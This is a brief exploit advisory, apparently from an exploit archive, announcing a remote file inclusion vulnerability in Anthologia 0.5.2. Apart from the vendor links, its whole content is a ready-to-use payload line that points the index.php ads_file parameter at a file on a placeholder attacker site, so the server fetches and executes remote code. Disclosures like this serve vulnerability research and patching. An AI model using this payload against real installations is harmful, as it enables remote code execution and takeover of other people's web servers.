id: 1768
date: 04/16/2007
title: Anthologia 0.5.2 (index.php ads_file) Remote File Inclusion Vulnerability
author: Dj7xpl
cves: 

=========================================================================
Anthologia 0.5.2 (index.php ads_file) Remote File Inclusion Vulnerability
=========================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                      ANTHOLOGIA 0.5.2 
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Type :     Remote File Inclusion Vuln
* Download:  http://www.dbfweb.com/download/anthologia-last.tgz
* Page:      http://www.dbfweb.com/anthology.htm
* Vuln:      index.php?ads_file=http://[EvilSite]/Evil.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-



#  0day.today [2023-03-22]  #